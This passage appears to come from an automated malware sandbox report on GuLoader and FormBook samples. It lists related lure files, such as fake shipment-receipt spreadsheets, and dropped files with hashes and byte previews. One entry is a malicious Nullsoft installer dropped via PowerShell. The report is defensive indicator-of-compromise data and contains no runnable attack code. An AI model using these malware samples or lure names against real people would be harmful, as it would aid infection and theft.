                                          fr34veeTGm.exeGet hashmaliciousGuLoaderBrowse
                                            ShipmentReceipt9521368040.xlsxGet hashmaliciousGuLoaderBrowse
                                              njUIPPVrud.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                njUIPPVrud.exeGet hashmaliciousGuLoaderBrowse
                                                  ShipmentReceipt93213628045.xlsxGet hashmaliciousGuLoaderBrowse

                                                    Created / dropped Files

                                                    C:\Users\Public\u5p3.bat

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Category:dropped
                                                    Size (bytes):344681
                                                    Entropy (8bit):6.7218967633534605
                                                    Encrypted:false
                                                    SSDEEP:6144:bmOPbtybqh+/fDv9vE520B36t/21/F99OjpiN6:ft2W+nz9s520j999OS6
                                                    MD5:9DCA43CB15D97693D2DE73683804C5C7
                                                    SHA1:3BF61BC542DB16E0A045505C2868CD12CFCAC769
                                                    SHA-256:C3AC750A23FB48EEE9E1CE2D9BD59AADBC190A1DD36AFBDC9F5C39EEB7F87756
                                                    SHA-512:26A0870AE04D5939C410F31B1755D0AE37658921536D6C6A02FA59003B5CF3AD1FC5D4DA919DD1B6D58B451210BD46084E74FD44C8988065FEE78B88EB122549
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*......=3............@.......................................@..........................................................................................................................................................text...mb.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...P...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):205
                                                    Entropy (8bit):5.590336342192793
                                                    Encrypted:false
                                                    SSDEEP:3:m+lvns8RzYOCGLvHkWBGKuKjXKLNjKLuV0fKTqi7mktFNBiTFJrqzOJkvP5m1:men9YOFLvEWdM9Qtyt3Bi7Z+P41
                                                    MD5:1F17A5F884553F388B738D6348DAEA79
                                                    SHA1:E312FB63FC530464FCFC894104D543AD28B59F24
                                                    SHA-256:7A32F6E3DF821E0F6B641F25D353FE79E0D4E202C31317F449C6C5F6B317B810
                                                    SHA-512:E823A4921B280343ADBD04482793D60240E6B2BB79AD0565AB31C4B8E637E881B4786EC1B0440A894FACCF7A8DC0ECFE50C44E8093A167CEC44FF986D814668A
                                                    Malicious:false
                                                    Preview:0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js ....[/....."#.D.7.....A.A..Eo......^...............d.{v.^.G...d.W.:...P..k%..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):174
                                                    Entropy (8bit):5.562019634990087
                                                    Encrypted:false
                                                    SSDEEP:3:m+lF9NX6v8RzYOCGLvHktWV0wpmktHlle98fZe/O+/rkwGhkg4m1:mi9NqEYOFLvEk/tS8Be7Ywcr1
                                                    MD5:5029706F1488EA245B32F3836DA68F8D
                                                    SHA1:96B5CCB47DDBF67CEC4E9845E9F2D5AA38CF7635
                                                    SHA-256:C3302AEC8FF8598DA5C70B3E994B26C957AAC8B72A087A8D44A16189EF939A2B
                                                    SHA-512:1E01795C363173E6FA0E550077C998879C25E951B02F4CAA80670AB52C1196A00CF9213CCA8AB9703A5CA56D3F83B3A72EC59E50E730AD3A7E0810EF393FACF0
                                                    Malicious:false
                                                    Preview:0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js ...p..[/....."#.D.......A.A..Eo......<............1.x.'.vI..*|Z..o...+.4....0..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):246
                                                    Entropy (8bit):5.574115370222055
                                                    Encrypted:false
                                                    SSDEEP:6:mMyEYOFLvEWdVFLBKFjVFLBKFlQhuedtqot/RlUoSjGY1:DyeRVFAFjVFAFGdtZlUo6
                                                    MD5:567613FF456142A3B92E0CD855A263B4
                                                    SHA1:BC73B44E1D25DA43903DE3A4EB31D871954B614E
                                                    SHA-256:A0CB4F680ABFAB388298AF9B592CF56A0B908B7546FFEA72045132986F79C849
                                                    SHA-512:B5670EE541D43169ECC0DAE919199AD0E58B6070F91B3C90108AD44E93FF7F62300C35330EAC901CEF15009B342D0FC9243BE9597ADE2D040ED4FAEF177D75F5
                                                    Malicious:false
                                                    Preview:0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js .....[/....."#.D.......A.A..Eo.........I..........hvDO.N.t@.....n.*...... ....A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0ace9ee3d914a5c0_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):232
                                                    Entropy (8bit):5.653634579453487
                                                    Encrypted:false
                                                    SSDEEP:3:m+lYbtLA8RzYOCGLvHkWBGKuKjXKLHGPmXKl5g9JMCv8P3b780WktyKjuiZmRulV:mNtVYOFLvEWdFCi5RsqrtxuiWulHyA1
                                                    MD5:34578C31F906EFD835C86DBDF28ACE13
                                                    SHA1:B32A461CF401745990C1FC8A411F94F7C7B866A9
                                                    SHA-256:F8E8EAFB09372B317DB8A42DD5B5F0FC93507AE637AC237903FFD072A07D1907
                                                    SHA-512:DBD7A277711B1F8D24D448144C00AB08C13727C57BB25A9CDD81C98F4E860303DBB2EB8C65066F92C9897D3F90CB1F0CF7FF1A63215CEAF2C1567C6F21A3B2C4
                                                    Malicious:false
                                                    Preview:0\r..m......h.....'....._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-tool-view.js ..cM..[/....."#.DO......A.A..Eo........1...........8 P..a...R..Y....7.@..2Dm{..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):210
                                                    Entropy (8bit):5.52866772594653
                                                    Encrypted:false
                                                    SSDEEP:6:m+yiXYOFLvEWd7VIGXVuxO9tZbVyh9PT41:pyixRuzKfV41T
                                                    MD5:F985C11AC16311F7125E7CD13B436568
                                                    SHA1:A58C92DB64C92552F055BAD1BFECAA08B2884E45
                                                    SHA-256:B80056690EB742C5F7653F96C8DBAB9F2822FFA376F6F8C4CF597D2BAEB19DD9
                                                    SHA-512:E8F8539DF0063B2D0C6C83351BC61A6E614575EEFC612351FB1B08FBD3E26BCC483E0D772492992606A4E28FF1E64BCD14642066667253BF69F676084503A4FF
                                                    Malicious:false
                                                    Preview:0\r..m......R...kP]g...._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/selector.js .bt...[/....."#.DAH.....A.A..Eo.......P.e........k.Q.....-_..y.....O...>..1....A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):216
                                                    Entropy (8bit):5.606333439113134
                                                    Encrypted:false
                                                    SSDEEP:3:m+lifll08RzYOCGLvHkWBGKuKjXKoyNjXKLuVR68r73Wkt7Bl5lYo2sZI8xeGvPo:mvYOFLvEWdhwjQp8Pjt73ZIl6P41
                                                    MD5:EBF0EDED7BF080874201D8175E813AE1
                                                    SHA1:6619E90816B9924BBC3F72529CFE278095D5745E
                                                    SHA-256:349987794B516AD234C6791E5519A229EBE12345FABB3407773E62DDE52AC873
                                                    SHA-512:BB39369D141F0771BDBC771504EC31F060FCDB137658DA546D9ACA7FB88823B7DD5AE4A181919A10757AEA46FAC296C8B098DE183B635100EF4181F7C3D2031E
                                                    Malicious:false
                                                    Preview:0\r..m......X.....V....._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/plugin.js ......[/....."#.D.......A.A..Eo.........>.........].>....uUf..N...k......c..l.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):209
                                                    Entropy (8bit):5.565659732406691
                                                    Encrypted:false
                                                    SSDEEP:3:m+lZd8RzYOCGLvHkWBGKuKjXKX7KoQRA/KVdKLuV3k3nQi4LktuzH/9cyxMtv9Ej:mJYOFLvEWdGQRQOdQvQetmD6g1
                                                    MD5:68EB2442F869BBFA001455D1D83C3BF7
                                                    SHA1:68296DD288ECE37533EFCF197E09AD21788F42F5
                                                    SHA-256:4AC89A8D159F8602147737B82D36C4AB13F50AC6E5F129393FF45F13C93473C3
                                                    SHA-512:E4E718C835EF8C69A1AD56082B0129412FA5F11E2848E98ED5F9D7C3BA26C891BF4B44509E884938C5381A36A72A0027F2462C0C12DAD23C642B08ACB1CCB940
                                                    Malicious:false
                                                    Preview:0\r..m......Q..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/plugin.js ..!...[/....."#.D.......A.A..Eo....................c..y/L....|y.n..C/I.....X7-ne.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):179
                                                    Entropy (8bit):5.5654883065407175
                                                    Encrypted:false
                                                    SSDEEP:3:m+lLp08RzYOCGLvHkfaMMuV2YIKlW1Ukti6tNQMWqg4nRb7om5m1:mOYOFLvECML2ilW19tauR/41
                                                    MD5:B6A5ABE7FABFCB5C2B4DB745454979F3
                                                    SHA1:08F6E47314F7A488A73AC4130DBB771FEE6279DF
                                                    SHA-256:DD18260BBDF427A3F5791DA833FA84DA817E01F159D22C7C642B38709AB726E6
                                                    SHA-512:78F4F7D83919B0BB85D57FAEAE80433B2B5A9A43F216A3FB57517E67576AA76A9B16498D817CDED016AFE7ECD06F26D01F0181A28EF6B73BA4E63246D6BDAD53
                                                    Malicious:false
                                                    Preview:0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js ...p..[/....."#.D......A.A..Eo........<..........y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\3a4ae3940784292a_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):214
                                                    Entropy (8bit):5.535968560319436
                                                    Encrypted:false
                                                    SSDEEP:6:m4fPYOFLvEWdtuiDqQtWBby0zBUKSAA1:pRz4Bb
                                                    MD5:C21E2428E82911495C2A341BBD8F26B4
                                                    SHA1:F8C7C504F81519D6B68299688170D6A2A5F319CD
                                                    SHA-256:98CDE2CA5948D4062F324CAE2F4DFFF2295F1B0792C1CA0314E8C7F17E213DB2
                                                    SHA-512:77314DDAC0C9C712BCD69361E5FF9F92494C9217AC393AB7BB48C48C4972F770CA621609C5F1A07512B681E08F943B8144796535F63CDB05DCABAB75166D3FCC
                                                    Malicious:false
                                                    Preview:0\r..m......V..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/search-summary/js/selector.js ..]...[/....."#.D.......A.A..Eo......+\..........Q..E.=....=h`t..t..3%A.F$..w..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):177
                                                    Entropy (8bit):5.514651309079122
                                                    Encrypted:false
                                                    SSDEEP:3:m+l64HXlA8RzYOCGLvHkjXMLOWFvpNWi4kUktFMd1dn76KohyP5m1:md4HXXYOFLvEjMSWFvSi4k9t2jUdyP41
                                                    MD5:60ACBB6A481EABA458EA79CA69D8F66A
                                                    SHA1:6421B0A08C76DE463170FF361D46DBF36EF1A7A3
                                                    SHA-256:972B2602CF82510EFC7F4B24DF4DFA5DA2A8B1BE5A083E7EFCB3D55773D0C141
                                                    SHA-512:7A5CB45C8E2950ECC3E245AA66EF744B4917110A84E3D899C9490F7C9A796A0F5E73C55EF101A6E31FB6771DEDED9902F9ADEC8549945178FC29E608350EA9B5
                                                    Malicious:false
                                                    Preview:0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js ...p..[/....."#.D.......A.A..Eo..................PU ....t^.....a.k..u.7.M.BW6#}..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):187
                                                    Entropy (8bit):5.54791009196045
                                                    Encrypted:false
                                                    SSDEEP:3:m+lpSUlIv8RzYOCGLvHkWBGKuK2fKVLFckt/9lXRUPqf9tsDMaPV44m1:mkl9YOFLvEWsfOLFVt1liPqVyM+VY1
                                                    MD5:FC0B14306F5A436D34D5EAF2F7CB3C08
                                                    SHA1:922853E90F50D64264F69A0690A327862313692F
                                                    SHA-256:E556C0DA45C09B16368AA8CCF610C60EBB28041E969BCE51284B6F74AD56C7A9
                                                    SHA-512:63E5C22FDF736A5E214F862B7D35B1C396E070AC883ACFA344A9EAD6A9340982B8EA38E41AD08A87DD707EAF67DA1A6F687357DD2D9F79E5B368FB758C3BA359
                                                    Malicious:false
                                                    Preview:0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js ......[/....."#.Dd......A.A..Eo......h.G...........q.O...j....._y..L^z...?..@N..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):244
                                                    Entropy (8bit):5.596841616087476
                                                    Encrypted:false
                                                    SSDEEP:6:mt9YOFLvEWdVFLBKFjVFLBKFlyXbQtxtwSeKaT9pr1:URVFAFjVFAFmQvtwSeKaTL
                                                    MD5:ACFB3539351E14F6654619799AEE8B15
                                                    SHA1:5E2093A19BC1F31E32BF9745F48217BD033780E6
                                                    SHA-256:739FA380E5EC70D8D540163260655D190220AB85A5FE64279520D944BB87418D
                                                    SHA-512:113D0CFA579F4AE6F82B5CF568052E334665EFDF740C8A244CEB8B628CE4372FB6C2474087C39F366C6B7BFE0A33632012D923805D9DD1F2BADBF71C468E9F1C
                                                    Malicious:false
                                                    Preview:0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js ......[/....."#.D.r.....A.A..Eo.........g..............H...{...2../.k`..r4.C. .A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):211
                                                    Entropy (8bit):5.5338033703765905
                                                    Encrypted:false
                                                    SSDEEP:3:m+lx4F08RzYOCGLvHkWBGKuKjXKGBIEGdevA/KPWFvU+KlEKkUktF57yrpYFm1:ms2VYOFLvEWdvBIEGdeXu9/9tq11
                                                    MD5:2655F2DF4C50F8CDA25B47D20F86C195
                                                    SHA1:1B909A7490326483070DAF39C404EF0FD378F087
                                                    SHA-256:8942324E0D186CADF48ACA1518580D0A11984894ADB17B49C4485CB319253686
                                                    SHA-512:6E0FE6AD06AFC046A3F3D7BFFC1197FFF018706772DB985167276DF31030EF896362B7514BE432FEBE2EF3B1D2335FB1D4486B37FE07877F9631C924AA0F7BB9
                                                    Malicious:false
                                                    Preview:0\r..m......S...]......._keyhttps://rna-resource.acrobat.com/static/js/plugins/add-account/js/selector.js ..S...[/....."#.D.K.....A.A..Eo......(............A.o]@r..Q.....<w.....].n\....A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):202
                                                    Entropy (8bit):5.624930858070465
                                                    Encrypted:false
                                                    SSDEEP:6:maVYOFLvEWdwAPCQZ+DiHtTlt7xm7OhKlvA1:RbR16s+WH/9xmJ
                                                    MD5:F9541846661C3CAA4380FE21143AB747
                                                    SHA1:5785D77D485DE8B299114859FE38075E051D41DB
                                                    SHA-256:A42C7C6F00D90829591984B979DD1BE6B658ABBC392F4BB0E7F022F793EC635A
                                                    SHA-512:EC2A11760EE2423BF5DE73A1C79D273F97B982EC0273E28A717FC9EB1D555D8E26F57D56E2B0C5394A79D1E7F70068A4E2E898B4950F0F769E995262CB83B30C
                                                    Malicious:false
                                                    Preview:0\r..m......J......{...._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/plugin.js ......[/....."#.D>......A.A..Eo.......p.o..........4T].....Tw.....(..b...EO....9.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):211
                                                    Entropy (8bit):5.563384294168943
                                                    Encrypted:false
                                                    SSDEEP:3:m+lx2gv8RzYOCGLvHkWBGKuKjXKX7KoQRA/KWEKPWFvGvYI+WLkt1sfddF5YufMy:ms2gEYOFLvEWdGQRQVuYYI+t1GdFt1
                                                    MD5:FC0523D7CFBF01EEF116ECEB2762D1BF
                                                    SHA1:706EB0A553BF2032EE6CA91EA21435A3E8377ADF
                                                    SHA-256:3D9DE06AB8BCACB37037C808BF67912F41867B02258D9E4B9B938C6DBD3CA479
                                                    SHA-512:F2885D82E9A1EBF9EFE697B42E5BD97C4AD9CAF872CBFF63E437BEEC567421B3D434C23763EF82FB9F148053DD1E18DBD390E38F1F4F5E01DC3E3F284AE217F0
                                                    Malicious:false
                                                    Preview:0\r..m......S...W.%z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/selector.js .#....[/....."#.Dh......A.A..Eo......)]..........@..{o]...9o|..qY....T....{..u.b..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):206
                                                    Entropy (8bit):5.585440124028964
                                                    Encrypted:false
                                                    SSDEEP:3:m+lerlyv8RzYOCGLvHkWBGKuKjXKX+IAHKLuV43X7mktGKKl/gEnNWQ1SUm1:mzyEYOFLvEWdrIOQ733tc/gEt1S/1
                                                    MD5:92BE2CCB1DF43797F7DD25BE18EFFC49
                                                    SHA1:C5879F362F7AA4EF5F8A361FF1E255D175ACC9E7
                                                    SHA-256:AFBF18C4952A466FC1A56A6FD42DE5442D54E16E0497D1B098EB10FAB28FFAA6
                                                    SHA-512:73720EDCFF33ABB787B2C632AF84A304FF970F669C89EC7E9A861AAC82B6CA9AD415E274BECE6B4630F2F547DF950BBDE95C5957AB313D36F1F48F9B6BAFA652
                                                    Malicious:false
                                                    Preview:0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js .(....[/....."#.D2......A.A..Eo.......K/..........t\a......x5.'OuE.C..@......x..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):218
                                                    Entropy (8bit):5.563609789057655
                                                    Encrypted:false
                                                    SSDEEP:3:m+lKcv8RzYOCGLvHkWBGKuKjXKoyNH/KPWFv6EG9i78kUktClwJNqww6U+5m1:mnYOFLvEWdhwyuH19tClwrqwK+41
                                                    MD5:C415546F3D149CCCB88CA268B5D7CD05
                                                    SHA1:66176D00DE5EA0EB1DC97410D037FA20AF90F23B
                                                    SHA-256:4F6FFB1A459B0BC976F010E6A8BE123BBDEFD4D2F34A3FF6CFE7ABAD960659F0
                                                    SHA-512:02C7317E205910B23CC4C77068C2185B98ED2CD132509F61618F23EF912E29E838BC6D229B949334D6C0A94098101660B6CBF5D9BDE919F818C42EADCC7571D0
                                                    Malicious:false
                                                    Preview:0\r..m......Z.........._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/selector.js ......[/....."#.D</.....A.A..Eo........|................7...o..a=.98I......(3.$G.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):230
                                                    Entropy (8bit):5.588871180929311
                                                    Encrypted:false
                                                    SSDEEP:6:mYXYOFLvEWdrROk/RJbuVXfKH4Qt9QfO441:/RrROk/Sf5QjQfL
                                                    MD5:20BBAAA7AA6A6E9EB4CBADD37086F845
                                                    SHA1:FBE3E3855212188B482806122AE98F92C825D5F4
                                                    SHA-256:B4DE7CADBFB76DDCE3C2D66FDD56EB7B8B0FC648BE7EF59B8B3365A44B50BAE8
                                                    SHA-512:EE7D1DA3D3482FD6701E8383C415C224102E7D53409ED61E862E7D8E5B679DBE8B74ADE6BA154E44F88126D90C751B140C40B6FF8601D68B6573431A3DA366D9
                                                    Malicious:false
                                                    Preview:0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js ......[/....."#.DO......A.A..Eo....................~..rw.+[....!.)?..f.U..(=.=.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):186
                                                    Entropy (8bit):5.552494387737446
                                                    Encrypted:false
                                                    SSDEEP:3:m+lhD4ll08RzYOCGLvHkWBGKuKdTSVynktSR8lXHzoIN1OFPL4m1:mmDEYOFLvEWXIyktll3zV1QPLr1
                                                    MD5:1548DD4460698F025AF123B7955327F6
                                                    SHA1:E9DA2A29DFE3DCCFB0A394A18677BA015C60FD9A
                                                    SHA-256:C3FF882691B55DC5FED2C580936489267C12A9D3598B1AE706FB15DE85B6AB12
                                                    SHA-512:71A7C88F63205F7F34FBE526EAC05A5AF0FDE321A708CE3C6812C1DBC436993649CD0E18CC886F1DF08F685B788FB23E9DB260CC5787B30EB379C54B20A492C8
                                                    Malicious:false
                                                    Preview:0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js ...~..[/....."#.DO......A.A..Eo.........)..........~]...%s..<...n.f..<.....1#..U..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):207
                                                    Entropy (8bit):5.6166413863367035
                                                    Encrypted:false
                                                    SSDEEP:3:m+l+nq1A8RzYOCGLvHkWBGKuKjXKLNfKPWFvTbB1NE80WktJn/U8D6EsEJeUm1:m52YOFLvEWdMAu5l1a3jtJnMEvsEJ41
                                                    MD5:A0107BC1E906D6E96D84A16DC295E38D
                                                    SHA1:C00AE456C9B53C2F1566FA85F71B4865E64D20F3
                                                    SHA-256:9518C0A248AC9FA1899F9022876A7965C2D7D1FAE644D6DA0298FC2CFCA38054
                                                    SHA-512:79ABBDCF17E1E15C5722BE31D4B8ABB473022389A70B8A9CEBE7868982F7C77B01469738F8B7B5922A8DFD56888EB88E8EF3B21009AE3AC17A6149855C512E0E
                                                    Malicious:false
                                                    Preview:0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js ..X...[/....."#.D.......A.A..Eo.......9............z._a...'.v.......4p3..1.']...A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):210
                                                    Entropy (8bit):5.553767459502717
                                                    Encrypted:false
                                                    SSDEEP:3:m+lf1UldA8RzYOCGLvHkWBGKuKjXK9QXAdWKfKPWFvYXDJ4LktwIFoDb7T2/Mm1:mYilPYOFLvEWd8CAdAuEDJt1ong1
                                                    MD5:090BE7AED268998EA3F43943EBF6A348
                                                    SHA1:4CDC1FEE418219B9AC10232BAC57BD7B0E1347ED
                                                    SHA-256:5B4D5C5043A412941D2C0EBB180C4129F47A81421CBA2B2255893E50B0B1B979
                                                    SHA-512:78BFEAFC1B3D71C6DF043D7BFBB98F5FFEEC669C64C42B3A67003972024E8F7E8A9484A73D45B5D8B2622B7ED77DAB852AA1F2D88C9F27F2A764C15B2860A581
                                                    Malicious:false
                                                    Preview:0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js ..r...[/....."#.D.......A.A..Eo........AU........c}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):223
                                                    Entropy (8bit):5.6142786480135465
                                                    Encrypted:false
                                                    SSDEEP:6:mY8nYOFLvEWdrROk/Iuv9tv9lVN16wG1:F8hRrROk/V97lv
                                                    MD5:ED08A49A94BE13C6C95E0E8830589D6D
                                                    SHA1:8E836607CB455082F40214F1C4A1C68C63A7B4DF
                                                    SHA-256:240E29DBB474803920AEDE22C538877C3A24F77DB9919C4F4C528BE980BD6EE4
                                                    SHA-512:67265FB3170E21842BEF4A2112ADFB11BA6D4390C5E2BECAA5B1B2C7664451EC2A250F68D37D490A54840EF1D730BA8D63E45168C26622F249840C8004474FE4
                                                    Malicious:false
                                                    Preview:0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js .....[/....."#.D.......A.A..Eo.......{.*..........%.k.SZ..~W.....:)'B..ad......A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):213
                                                    Entropy (8bit):5.6818073258184105
                                                    Encrypted:false
